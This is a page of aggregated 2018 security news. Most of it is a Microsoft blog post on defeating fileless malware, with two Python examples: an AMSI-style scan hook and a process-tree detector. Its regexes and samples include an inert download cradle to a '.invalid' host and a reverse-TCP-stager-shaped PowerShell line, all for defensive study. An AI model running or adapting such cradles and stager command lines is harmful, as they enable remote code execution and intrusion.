  2. Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m. ET/Noon PT. Learn, connect with other parents and safety pros, and chime in.
  3. Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT.™ on how each family member can protect their devices and information.
  4. Print it and post it: Print out a STOP. THINK. CONNECT.™ tip sheet and display it in areas where family members spend time online.
  5. Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to install a firewall, strengthen your passwords, and make sure your home network is as secure as it can be.
  6. If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
  7. Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
  8. Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.

Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.

NTIA Seeks Public Comment on Approach to Consumer Privacy with an Eye Toward Building Better Privacy Protections

On September 26, 2018, the U.S. Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) announced that it is seeking public comments on a proposed approach to advancing consumer privacy. The approach is divided into two parts: (1) a set of desired user-centric privacy outcomes of organizational practices, including transparency, control, reasonable minimization (of data collection, storage length, use and sharing), security, access and correction, risk management and accountability; and (2) a set of high-level goals that describe the outlines of the ecosystem that should be created to provide those protections, including harmonizing the regulatory landscape, balancing legal clarity and the flexibility to innovate, ensuring comprehensive application, employing a risk and outcome-based approach, creating mechanisms for interoperability with international norms and frameworks, incentivizing privacy research, ensuring that the Federal Trade Commission has the resources and authority to enforce, and ensuring scalability.

The NTIA is specifically looking to the public to respond with comments on the following questions:

  • Are there other outcomes or goals that should be included, or outcomes or goals that should be expanded upon as separate items?
  • Are the descriptions for the outcomes and goals clear, or are there are any issues raised by how any of them are described?
  • Are there any risks that accompany the list of outcomes, the list of goals or the general approach taken?
  • Are there any aspects of the approach that could be implemented or enhanced through Executive action or non-regulatory actions, and if so, what actions?
  • Should further explorations be made regarding additional commercial data privacy-related issues, including any recommended focus and desired outcomes?
  • Are there any aspects of the approach that may be achieved by other means, such as through statutory changes?
  • Do any terms used in the approach require more precise definitions, including suggestions for better definitions and additional terms?
  • Do changes need to be made with regard to the FTC’s resources, processes and/or statutory authority?
  • If all or some of the outcomes or goals described in this approach were replicated by other countries, do you believe it would be easier for U.S. companies to provide goods and services in those countries?
  • Are there other ways to achieve U.S. leadership that are not included in the approach?
  • Are there any high-level goals in this approach that would be detrimental to achieving U.S. leadership?

Comments are due by October 26, 2018, and may be submitted by email. Additional information can be found in the Federal Register Notice.

Port of San Diego Suffers Ransomware Attack

The FBI and the U.S. Department of Homeland Security are investigating a ransomware attack that affected at least some of the information systems belonging to the Port of San Diego. Port officials first reported the attack on Tuesday. Port of San Diego CEO Randa Coniglio said in a written statement that its investigation of the […]… Read More

The post Port of San Diego Suffers Ransomware Attack appeared first on The State of Security.

Google Hacker Discloses New Linux Kernel Vulnerability and PoC Exploit

A cybersecurity researcher with Google Project Zero has released the details, and a proof-of-concept (PoC) exploit for a high severity vulnerability that exists in Linux kernel since kernel version 3.16 through 4.18.8. Discovered by white hat hacker Jann Horn, the kernel vulnerability (CVE-2018-17182) is a cache invalidation bug in the Linux memory management subsystem that leads to

Vulnerabilities and architectural considerations in industrial control systems

The reason SCADA security is so controversial stems primarily from the intense consequences that come from a compromise in this area. In this podcast, Andrew Ginter, VP of Industrial Security at Waterfall Security Solutions, and Edward Amoroso, CEO of TAG Cyber, talk about SCADA vulnerabilities in ICS architectures. Here’s a transcript of the podcast for your convenience. Andrew Ginter: Hello everyone. Thank you for joining us. I’m Andrew Ginter, the vice president industrial security at … More

The post Vulnerabilities and architectural considerations in industrial control systems appeared first on Help Net Security.

An investigation into how cyber ready businesses really are

The more cyber ready a business becomes, the better its overall business outcomes. Vodafone’s Cyber Ready Barometer notes 48% of cyber ready businesses are reporting more than 5% increases in annual revenue as well as high stakeholder trust levels. Despite this, the research also shows that only 24% of businesses globally could reasonably call themselves cyber ready. Cyber readiness, according to the report, is a mix of different measures including cyber operations, cyber strategies, cyber … More

The post An investigation into how cyber ready businesses really are appeared first on Help Net Security.

Organizations apply stronger PKI security controls due to their increasingly critical role

The Internet of Things is the fastest growing trend driving the deployment of applications that use public key infrastructure as evidenced by the Thales 2018 Global PKI Trends Study. The report, based on independent research by the Ponemon Institute, reveals continued and increased reliance on PKI as a core enterprise asset and a root of trust. Over the past few years, cloud applications, and now the IoT, are the newest disrupters to future PKI planning … More

The post Organizations apply stronger PKI security controls due to their increasingly critical role appeared first on Help Net Security.

16-Year-Old Boy Who Hacked Apple’s Private Systems Gets No Jail Time

An Australian teenager who pleaded guilty to breaking into Apple's private systems multiple times over several months and downloading some 90GB of secure files has avoided conviction and will not serve time in prison. An Australian Children's Court has given the now 19-year-old adult defendant, who was 16 at the time of committing the crime, a probation order of eight months, though the magistrate

Chronicle announces VirusTotal Enterprise with greater search and analysis capabilities

Chronicle, the cybersecurity subsidiary of Google’s parent company Alphabet, has announced VirusTotal Enterprise, which is aimed at helping enterprises protect their own networks. About VirusTotal Enterprise VirusTotal is a well-known website/online service that allows anyone to check whether a submitted file or URL is detected as malicious by a variety of antivirus products and website/domain scan engines. VirusTotal Enterprise will allow (paying) users to search for malware samples (using VT Intelligence), hunt for future malware … More

The post Chronicle announces VirusTotal Enterprise with greater search and analysis capabilities appeared first on Help Net Security.

Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV

Consider this scenario: Two never-before-seen, heavily obfuscated scripts manage to slip past file-based detection and dynamically load an info-stealing payload into memory. The scripts are part of a social engineering campaign that tricks potential victims into running the scripts, which use the file names install_flash_player.js and BME040429CB0_1446_FAC_20130812.XML.PDF.js, to distribute and run the payload.

The payload is sophisticated and particularly elusive, given that it:

  • Doesn’t touch the disk, and does not trigger antivirus file scanning
  • Is loaded in the context of the legitimate process that executed the scripts (i.e., wscript.exe)
  • Leaves no traces on the disk, such that forensic analysis finds limited evidence

These are markers of a fileless threat. Still, Windows Defender Advanced Threat Protection (Windows Defender ATP) antivirus capabilities detect the payload, stopping the attack in its tracks. How is this possible?

In this scenario, Antimalware Scan Interface (AMSI) facilitates detection. AMSI is an open interface that allows antivirus solutions to inspect script behavior by exposing script contents in a form that is both unencrypted and unobfuscated.

AMSI is part of the range of dynamic next-gen features that enable antivirus capabilities in Windows Defender ATP to go beyond file scanning. These features, which also include behavior monitoring, memory scanning, and boot sector protection, catch a wide spectrum of threats, including new and unknown (like the two scripts described above), fileless threats (like the payload), and other sophisticated malware.

Generically detecting fileless techniques

The two aforementioned obfuscated scripts are actual malware detected and blocked in the wild by antivirus capabilities in Windows Defender ATP. Removing the first layer of obfuscation reveals code that, while still partially obfuscated, shows some functions related to a fileless malware technique called Sharpshooter. We found the two scripts, which were variants of the same malware, not long after the Sharpshooter technique was documented and published by MDSec in 2017.

The Sharpshooter technique allows an attacker to use a script to execute a .NET binary directly from memory without ever needing to reside on the disk. This technique provides a framework that can enable attackers to easily repackage the same binary payload within a script. As demonstrated by the example of the two scripts, files that use the Sharpshooter technique can then be used in social engineering attacks to lure users into running the script to deliver a fileless payload.

Figure 1. Obfuscated code from install_flash_player.js script

Figure 2. After de-obfuscation, the script contains functions typically used in the Sharpshooter technique

When the Sharpshooter technique became public, we knew it was only a matter of time before it would be used in attacks. To protect customers from such attacks, we implemented a detection algorithm based on runtime activity rather than on the static script. In other words, the detection is effective against the Sharpshooter technique itself, and thus against new and unknown threats that implement the technique. This is how Windows Defender ATP blocked the two malicious scripts at first sight, preventing the fileless payload from being loaded.

The detection algorithm leverages AMSI support in scripting engines and targets a generic malicious behavior (a fingerprint of the malicious fileless technique). Script engines have the capability to log the APIs called by a script at runtime. This API logging is dynamic and is therefore not hindered by obfuscation: a script can hide its code, but it cannot hide its behavior. The log can then be scanned by antivirus solutions via AMSI when certain dangerous APIs (i.e., triggers) are invoked.

This is the dynamic log generated by the scripts and detected by Windows Defender ATP at runtime via AMSI:

Figure 3. Dynamic AMSI log generated during the execution of the Sharpshooter technique in the two malicious scripts

Using this AMSI-aided detection, Windows Defender ATP disrupted two distinct malware campaigns in June, as well as the steady hum of daily activities.

Figure 4. Windows Defender ATP telemetry shows two Sharpshooter campaigns in June

Furthermore, generically detecting the Sharpshooter technique allowed us to discover a particularly sophisticated and interesting attack. Windows Defender ATP’s endpoint detection and response capabilities caught a VBScript file that used the Sharpshooter technique.

Figure 5. Sample Windows Defender ATP alert showing how detection of the Sharpshooter technique by Windows Defender AV is surfaced in Windows Defender Security Center

We analyzed the script and extracted the fileless payload, a very stealthy .NET executable. The malware payload downloads data from its command-and-control (C&C) server via the TXT records of DNS queries. In particular, it downloads the initialization vector and decryption key necessary to decode the core of the malware. That core is also fileless because it’s executed directly in memory without being written to the disk. Thus, this attack leveraged two fileless stages.

Figure 6. The core component of the malware is decrypted and executed from memory

Our investigation into the incident turned up enough indicators for us to conclude that this was likely a penetration testing exercise or a test involving running actual malware, and not a real targeted attack.

Nonetheless, the use of fileless techniques and the covert network communication hidden in DNS queries make this malware similar in nature to sophisticated, real-world attacks. It also proved the effectiveness of the dynamic protection capabilities of Windows Defender ATP. In a previous blog post, we documented how such capabilities allow Windows Defender ATP to catch KRYPTON attacks and other high-profile malware.

Upward trend in fileless attacks and living off the land

Removing the need for files is the next progression of attacker techniques. Antivirus solutions have become very efficient in detecting malicious executables. Real-time protection gives visibility on each new file that lands on the disk. Furthermore, file activity leaves a trail of evidence that can be retrieved during forensic analysis. That’s why we are seeing an increase in attacks that use malware with fileless techniques.

At a high level, fileless malware runs its main payload directly in memory without having to drop the executable file on the disk first. This differs from traditional malware, where the payload always requires some initial executable or DLL to carry out its tasks. A common example is the Kovter malware, which stores its executable payload entirely in registry keys. Going fileless allows the attackers to avoid having to rely on physical files and improves stealth and persistence.

For attackers, building fileless attacks poses some challenges; first of all: how do you execute code if you don’t have a file? Attackers found an answer in the way they infect other components to achieve execution within these components’ environment. Such components are usually standard, legitimate tools that are present by default on a machine and whose functionality can be abused to accomplish malicious operations.

This technique is usually referred to as “living off the land”, as malware only uses resources already available in the operating system. An example is the Trojan:Win32/Holiks.A malware abusing the mshta.exe tool:

Figure 7. Trojan:Win32/Holiks.A is abusing mshta.exe to execute a script from the command line

The malicious script resides only in the command line; it loads and executes further code from a registry key. The whole execution happens within the context of the mshta.exe process, which is a clean executable and tends to be trusted as a legitimate component of the operating system. Other similar tools, such as cmstp.exe, regsvr32.exe, powershell.exe, odbcconf.exe and rundll32.exe, just to name a few, have been abused by attackers. Of course, the execution is not limited to scripts; the tools may allow the execution of DLLs and executables, even from remote locations in some cases.

By living off the land, fileless malware can cover its tracks: no files are available to the antivirus for scanning and only legitimate processes are executed. Windows Defender ATP overcomes this challenge by monitoring the behavior of the system for anomalies or known patterns of malicious usage of legitimate tools. For example, Trojan:Win32/Powemet.A!attk is a generic behavior-based detection designed to prevent attacks that leverage the regsvr32.exe tool to run malicious scripts.

Figure 8. Antivirus capabilities in Windows Defender ATP blocking the legitimate regsvr32 tool abused to download and run a malicious remote script

What exactly is fileless?

The term fileless suggests a threat that does not come in a file, such as a backdoor that lives only in the memory of a machine. However, there’s no generally accepted definition. The term is used broadly; it’s also used to describe malware families that do rely on files in order to operate. In the Sharpshooter example, while the payload itself is fileless, the entry point relies on scripts that need to be dropped on the target’s machine and executed. This, too, is considered a fileless attack.

Given that attacks involve several stages for functionalities like execution, persistence, information theft, lateral movement, communication with command-and-control, etc., some parts of the attack chain may be fileless, while others may involve the filesystem in some form or another.

To shed light on this loaded term, we grouped fileless threats into different categories.

Figure 9. Taxonomy of fileless threats

We can classify fileless threats by their entry point (i.e., execution/injection, exploit, hardware), then the form of entry point (e.g., file, script, etc.), and finally by the host of the infection (e.g., Flash, Java, documents).

From this classification, we can glean three big types of fileless threats based on how much of a fingerprint they may leave on infected machines.

  • Type I: No file activity performed. A completely fileless malware can be considered one that never requires writing a file on the disk.
  • Type II: No files written on disk, but some files are used indirectly. There are other ways that malware can achieve fileless presence on a machine without requiring significant engineering effort. Fileless malware of this type does not directly write files on the file system, but it can end up using files indirectly.
  • Type III: Files required to achieve fileless persistence. Some malware can have some sort of fileless persistence but not without using files in order to operate.

Having described the broad categories, we can now dig into the details and provide a breakdown of the infection hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure malware does not get the upper hand in the arms race.

Exploits
  • File-based (Type III: executable, Flash, Java, documents)
  • Network-based (Type I)

Hardware
  • Device-based (Type I: network card, hard disk)
  • CPU-based (Type I)
  • USB-based (Type I)
  • BIOS-based (Type I)
  • Hypervisor-based (Type I)

Execution or injection
  • File-based (Type III: executables, DLLs, LNK files, scheduled tasks)
  • Macro-based (Type III: Office documents)
  • Script-based (Type II: file, service, registry, WMI repo, shell)
  • Disk-based (Type II: Boot Record)

For a detailed description and examples of these categories, visit this comprehensive page on fileless threats.

Defeating fileless malware with next-gen protection

File-based inspection is ineffective against fileless malware. Antivirus capabilities in Windows Defender ATP use defensive layers based on dynamic behavior and integrate with other Windows technologies to detect and terminate threat activity at runtime.

Windows Defender ATP’s next-gen dynamic defenses have become of paramount importance in protecting customers from the increasingly sophisticated attacks that fileless malware exemplifies. In a previous blog post we described some of the offensive and defensive technologies related to fileless attacks and how these solutions help protect our customers. Evolving from the file-centric scanning model, Windows Defender ATP uses a generic and more powerful behavior-centric detection model to neutralize generic malicious behaviors and thus take out entire classes of attack.

AMSI

Antimalware Scan Interface (AMSI) is an open framework that applications can use to request antivirus scans of any data. Windows leverages AMSI extensively in JavaScript, VBScript, and PowerShell. In addition, Office 365 client applications integrate with AMSI, enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior. In the example above, we have shown how AMSI can be a powerful weapon to fight fileless malware.

Windows Defender ATP has implemented an AMSI provider and consumes all AMSI signals for protection; these signals are especially effective against obfuscation. This has led to the disruption of malware campaigns like Nemucod. During a recent investigation, we stumbled upon some malicious scripts that were heavily obfuscated. We collected three samples that evaded static signatures and consisted of a mixture of barely recognizable script code and binary junk data.

Figure 10. Heavy obfuscation of three different samples of TrojanDownloader:Script/Nemucod.JAC

However, after manual de-obfuscation, it turned out that these samples decode and execute the same .js script payload, a known downloader:

Figure 11. A portion of the second-stage downloader decrypted by Nemucod.JAC

The payload does not have any obfuscation and is very easy to detect, but it never touches the disk and so could evade file-based detection. However, the scripting engine is capable of intercepting the attempt to execute the decoded payload and ensuring that the payload is passed to the installed antivirus via AMSI for inspection. Windows Defender ATP has visibility on the real payload as it’s decoded at runtime and can easily recognize known patterns and block the attack before it deals any damage.
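The scan-before-execute interception described in this paragraph and in the AMSI overview above, as an added toy model in Python (not Microsoft's code and not the real AMSI API): a script host hands every buffer to the scanner after decoding, so a static scan of the obfuscated file finds nothing while the runtime hook catches the decoded downloader. The toy language, the signature and both sample scripts are constructed for the example.

```python
"""Toy script host with an AMSI-style scan hook.

Constructed illustration (not Microsoft's code and not the real AMSI API):
it models the behaviour described above.  Every buffer the script asks the
engine to run is handed to the installed scanner *after* decoding, so an
obfuscated outer layer cannot hide the payload that eventually executes.
"""
import base64
import re

# Hypothetical scanner signatures: each is a list of patterns that must all
# match the same buffer.  The download-and-save object pair below is the sort
# of thing a decoded script downloader exposes and its obfuscated wrapper does not.
SIGNATURES = {
    "constructed-download-cradle": [
        re.compile(r'ActiveXObject\(\s*"MSXML2\.XMLHTTP"\s*\)', re.I),
        re.compile(r'ActiveXObject\(\s*"ADODB\.Stream"\s*\)', re.I),
    ],
}


def amsi_scan(buffer: str):
    """Return the name of the first signature whose patterns all match, else None."""
    for name, patterns in SIGNATURES.items():
        if all(p.search(buffer) for p in patterns):
            return name
    return None


class ScanBlocked(Exception):
    """Raised by the host when the scanner rejects a buffer."""


class ScriptHost:
    """Minimal 'script engine' for a one-instruction toy language.

    A line 'EVAL_B64 <payload>' base64-decodes its argument and executes the
    result as a new script (the eval-style call an obfuscated downloader uses
    to reach its real code); every other line is an ordinary statement and is
    only recorded.
    """

    def __init__(self, scanner):
        self.scanner = scanner
        self.scan_log = []   # (stage, verdict) for every buffer submitted
        self.executed = []   # statements that actually ran

    def execute(self, source: str, stage: int = 0):
        # The AMSI-style hook: the buffer is scanned as it is about to run,
        # whatever obfuscation produced it.
        verdict = self.scanner(source)
        self.scan_log.append((stage, verdict))
        if verdict is not None:
            raise ScanBlocked(f"stage {stage}: {verdict}")
        for line in source.splitlines():
            line = line.strip()
            if not line:
                continue
            if line.startswith("EVAL_B64 "):
                decoded = base64.b64decode(line[len("EVAL_B64 "):]).decode()
                self.execute(decoded, stage + 1)   # nested buffer is scanned too
            else:
                self.executed.append(line)


# Constructed sample: an inert plaintext download cradle (.invalid host, no run step) ...
PLAIN_DOWNLOADER = "\n".join([
    'var http = new ActiveXObject("MSXML2.XMLHTTP");',
    'http.open("GET", "http://stage2.example.invalid/x", false);',
    'var out = new ActiveXObject("ADODB.Stream");',
])

# ... wrapped in an obfuscation layer: junk plus the real code hidden in a
# base64 blob that only exists in plaintext at runtime.
OBFUSCATED_SAMPLE = "\n".join([
    'var junk = "x7f3" + "9q2";',
    "EVAL_B64 " + base64.b64encode(PLAIN_DOWNLOADER.encode()).decode(),
])


def run_script(source: str) -> dict:
    """Execute a script under the hook and report where (if at all) it was blocked."""
    host = ScriptHost(amsi_scan)
    blocked_at, verdict = None, None
    try:
        host.execute(source)
    except ScanBlocked:
        blocked_at, verdict = host.scan_log[-1]
    return {
        "blocked_at_stage": blocked_at,
        "verdict": verdict,
        "buffers_scanned": len(host.scan_log),
        "statements_run": len(host.executed),
    }


if __name__ == "__main__":
    # A static scan of the file on disk sees only junk and base64: no match.
    print("static scan:", amsi_scan(OBFUSCATED_SAMPLE))
    # The runtime hook sees the decoded stage and blocks it before it executes.
    print("runtime scan:", run_script(OBFUSCATED_SAMPLE))
```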

Instead of writing a generic detection algorithm based on the obfuscation patterns in the samples, we trained an ML model on this behavior log and wrote heuristic detection to catch the decrypted scripts inspected via AMSI. The results proved effective, catching new and unknown variants, protecting almost two thousand machines in a span of two months. Traditional detection would not have been as effective.

Figure 12. Nemucod.JAC attack campaigns caught via AMSI

Behavior monitoring

Windows Defender ATP’s behavior monitoring engine provides an additional layer of antivirus protection against fileless malware. The behavior monitoring engine filters suspicious API calls. Detection algorithms can then match dynamic behaviors that use particular sequences of APIs with specific parameters and block processes that expose known malicious behaviors. Behavior monitoring is useful not only for fileless malware, but also for traditional malware where the same malicious code base gets continuously repacked, encrypted, or obfuscated. Behavior monitoring proved effective against WannaCry, which was distributed through the DoublePulsar backdoor and can be categorized as a very dangerous Type I fileless malware. While several variants of the WannaCry binaries were released in attack waves, the behavior of the ransomware remained the same, allowing antivirus capabilities in Windows Defender ATP to block new versions of the ransomware.

Behavior monitoring is particularly useful against fileless attacks that live off the land. The PowerShell reverse TCP payload from Meterpreter is an example: it can be run completely on a command line and can provide a PowerShell session to a remote attacker.

Figure 13. Example of a possible command line generated by Meterpreter

There’s no file to scan in this attack, but through behavior monitoring in its antivirus capabilities, Windows Defender ATP can detect the creation of the PowerShell process with the particular command line required. Behavior monitoring detects and blocks numerous attacks like this on a daily basis.

Figure 14. Detections of the PowerShell reverse TCP payload

Beyond looking at events by process, behavior monitoring in Windows Defender ATP can also aggregate events across multiple processes, even if they are sparsely connected via techniques like code injection from one process to another (i.e., not just parent-child processes). Moreover, it can persist and orchestrate sharing of security signals across Windows Defender ATP components (e.g., endpoint detection and response) and trigger protection through other parts of the layered defenses.

Behavior monitoring across multiple processes is not only an effective protection against fileless malware; it's also a tool to catch attack techniques in generic ways. Here is another example of multi-process behavior monitoring in action: Pyordono.A is a detection based on multi-process events and is aimed at blocking scripting engines (JavaScript, VBScript, Office macros) that try to execute cmd.exe or powershell.exe with suspicious parameters. Windows Defender ATP telemetry shows this detection algorithm protecting users from several campaigns.

Figure 15. Pyordono.A technique detected in the wild

Recently, we saw a sudden increase in Pyordono.A encounters, reaching levels way above the average. We investigated this anomaly and uncovered a widespread campaign that used malicious Excel documents and targeted users in Italy from September 8 to 12.

Figure 16. Malicious Excel document with instructions in Italian to click Enable content

The document contains a malicious macro and uses social engineering to lure potential victims into running the malicious code. (Note: We have recently integrated Office 365 client apps with AMSI, enabling antivirus solutions to scan macros at runtime to check for malicious content.)

Figure 17. The obfuscated macro code attempts to run an obfuscated cmd command, which in turn executes an obfuscated PowerShell script. In the end, the Ursnif trojan is delivered.

The macro makes use of obfuscation to execute a cmd command, which is also obfuscated. The cmd command executes a PowerShell script that in turn downloads additional data and delivers the payload, infostealing Ursnif. We recently reported a small-scale Ursnif campaign that targeted small businesses in specific US cities. Through multi-process behavior monitoring, Windows Defender ATP detected and blocked the new campaign targeting users in Italy using a generic detection algorithm without prior knowledge of the malware.
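As an added illustration of the two detections discussed in this section (the PowerShell reverse TCP command line, and Pyordono.A-style blocking of script hosts that launch cmd.exe or powershell.exe with suspicious parameters), here is a small Python detector run over constructed process-creation events. It is not Microsoft's code; the process names, parameter patterns and sample command lines are assumptions chosen for the example.

```python
"""Added example, not Microsoft's code: a toy multi-process behavior
monitor over constructed process-creation events. It models the two
detections discussed in the post: a PowerShell command line shaped like
a reverse-TCP stager, and a scripting engine or Office application that
spawns cmd.exe/powershell.exe with suspicious parameters somewhere down
its process chain. Process names, parameter patterns and sample command
lines are assumptions chosen for the example."""

from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image file name, e.g. "powershell.exe"
    cmdline: str    # full command line as recorded at process creation


# Parents that should not normally be launching shells (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe",
                "winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Command-line features treated as "suspicious parameters". Each regex is
# keyed by a label so an alert can say which features fired; (?i) makes the
# match case-insensitive because PowerShell accepts any casing.
SUSPICIOUS = {
    "hidden_window":   re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden"),
    "no_profile":      re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile)\b"),
    "encoded_command": re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "policy_bypass":   re.compile(r"(?i)(?:^|\s)-(?:ep|executionpolicy)\s+bypass"),
    "download_exec":   re.compile(r"(?i)downloadstring|downloadfile|\biex\b|invoke-expression"),
    "tcp_client":      re.compile(r"(?i)net\.sockets\.tcpclient"),
}


def suspicious_params(cmdline: str) -> list[str]:
    """Labels of every suspicious feature present in a command line."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(cmdline)]


def ancestors(ev: ProcEvent, by_pid: dict, max_depth: int = 4) -> list[ProcEvent]:
    """Walk the parent chain (nearest first), stopping at an unknown parent."""
    chain, cur = [], ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        chain.append(cur)
    return chain


def detect(events: list[ProcEvent]) -> list[dict]:
    """Correlate process-creation events across the process tree.

    Rule 1 (single process): powershell.exe whose command line embeds a TCP
    client, or combines an encoded command with a hidden window.
    Rule 2 (multi-process): cmd.exe/powershell.exe with suspicious parameters
    whose ancestry, not only its direct parent, contains a script host.
    """
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        image = ev.image.lower()
        params = suspicious_params(ev.cmdline)
        if image == "powershell.exe" and (
                "tcp_client" in params
                or {"encoded_command", "hidden_window"} <= set(params)):
            alerts.append({"rule": "PowerShell/ReverseTcp", "pid": ev.pid,
                           "params": params, "via": None})
        if image in SHELLS and params:
            host = next((a for a in ancestors(ev, by_pid)
                         if a.image.lower() in SCRIPT_HOSTS), None)
            if host is not None:
                alerts.append({"rule": "ScriptHostSpawnsShell", "pid": ev.pid,
                               "params": params, "via": host.image})
    return alerts


# Constructed sample: an Excel document launching cmd.exe, which launches
# PowerShell with an encoded command (the base64 is just the alphabet, not a
# real payload), plus a stand-alone stager-shaped PowerShell command line and
# a benign backup script started from explorer.exe for contrast.
ENCODED_CHAIN = ("cmd.exe /c powershell -nop -w hidden "
                 "-e QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=")
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent(200, 100, "EXCEL.EXE",      r'"EXCEL.EXE" C:\Users\victim\Downloads\fattura.xls'),
    ProcEvent(300, 200, "cmd.exe",        ENCODED_CHAIN),
    ProcEvent(400, 300, "powershell.exe", ENCODED_CHAIN[len("cmd.exe /c "):]),
    ProcEvent(500, 100, "powershell.exe", r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    ProcEvent(700, 100, "powershell.exe",
              'powershell -nop -w hidden -c "$c = New-Object Net.Sockets.TcpClient(<host>, <port>); ..."'),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Rule 2 walks the whole ancestry rather than only the direct parent, which is what lets the macro, cmd.exe and PowerShell events be judged as one chain while the backup script started from explorer.exe stays unflagged.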

Memory scanning

Antivirus capabilities in Windows Defender ATP also employ memory scanning to detect the presence of malicious code in the memory of a running process. Even if malware can run without the use of a physical file, it does need to reside in memory in order to operate and is therefore detectable by means of memory scanning. An example is the GandCrab ransomware, which was reported to have become fileless. The payload DLL is encoded in a string, then decoded and run dynamically via PowerShell. The DLL itself is never dropped on the disk. Using memory scanning, Windows Defender ATP can scan the memory of running processes and detect known patterns of the ransomware run from the stealthy DLL.

Memory scanning, in conjunction with behavior monitoring and other dynamic defenses, helped Windows Defender ATP to disrupt a massive Dofoil campaign. Dofoil, a known nasty downloader, uses some sophisticated techniques to evade detection, including process hollowing, which allows the malware to execute in the context of a legitimate process (e.g., explorer.exe). To this day, memory scanning detects Dofoil activities.

Figure 18. Detections of the memory-resident Dofoil payload

Memory scanning is a versatile tool: when suspicious APIs or behavior monitoring events are observed at runtime, antivirus capabilities in Windows Defender ATP trigger a memory scan at key points where a payload that has been decoded and may be about to run is more likely to be observed (and detected). This gives Windows Defender ATP granular control over which actions are more interesting and may require more attention. Every day, memory scanning allows Windows Defender ATP to protect thousands of machines against active high-profile threats like Mimikatz and WannaCry.

Boot Sector protection

With Controlled folder access on Windows 10, Windows Defender ATP does not allow write operations to the boot sector, thus closing a dangerous fileless attack vector used by Petya, BadRabbit, and bootkits in general. Boot infection techniques are well suited to fileless threats because they allow malware to reside outside of the file system and gain control of the machine before the operating system is loaded. The use of rootkit techniques, as in the defunct Alureon malware (also known as TDSS or TDL-4), can then render the malware invisible and extremely difficult to detect and remove. With Controlled folder access, which is part of Windows Defender ATP's attack surface reduction capabilities, this entire class of infection technique has become a thing of the past.

Figure 19. Controlled folder access preventing a boot sector infection attempted by Petya

Windows 10 in S mode: Naturally resistant to fileless attacks

Windows 10 in S mode comes with a preconfigured set of restrictions and policies that make it naturally protected against a vast majority of the fileless techniques (and against malware in general). Among the available security features, the following ones are particularly effective against fileless threats:

For executables: Only Microsoft-verified applications from the Microsoft Store are allowed to run. Furthermore, Device Guard provides User Mode Code Integrity (UMCI) to prevent the loading of unsigned binaries.

For scripts: Scripting engines are not allowed to run (including JavaScript, VBScript, and PowerShell).

For macros: Office 365 does not allow the execution of macros in documents from the internet (for example, documents that are downloaded or received as attachment in emails from outside the organization).

For exploits: Exploit protection and Attack surface reduction rules are also available on Windows 10 in S mode as a consistent barrier against exploitation.

With these restrictions in place, Windows 10 in S mode devices are in a robust, locked down state, removing crucial attack vectors used by fileless malware.

Conclusion

As antivirus solutions become better and better at pinpointing malicious files, the natural evolution of malware is to shift to attack chains that use as few files as possible. While fileless techniques used to be employed almost exclusively in sophisticated cyberattacks, they are now becoming widespread in common malware, too.

At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions that continuously enhance Windows security and mitigate classes of threats. We instrument durable generic detections that are effective against a wide range of threats. Through AMSI, behavior monitoring, memory scanning, and boot sector protection, we can inspect threats even with heavy obfuscation. Machine learning technologies in the cloud allow us to scale these protections against new and emerging threats.

Security solutions on Windows 10 integrate into a unified endpoint security platform in Windows Defender Advanced Threat Protection. Windows Defender ATP includes attack surface reduction, next-generation protection, endpoint protection and response, auto investigation and remediation, security posture, and advanced hunting capabilities. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

Protections against fileless and other threats are shared across Microsoft 365, which integrates technologies in Windows, Office 365, and Azure. Through the Microsoft Intelligent Security Graph, security signals are shared and remediation is orchestrated across Microsoft 365.

 

 

Andrea Lelli
Windows Defender Research

The post Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV appeared first on Microsoft Secure.

Do You Suffer From Breach Optimism Bias?

If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to or optimization of a cybersecurity policy, mitigating control or organizational belief. This “It hasn’t happened to us so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.

Read my full article over at Forbes.com.

Cybersecurity Researchers Spotted First-Ever UEFI Rootkit in the Wild

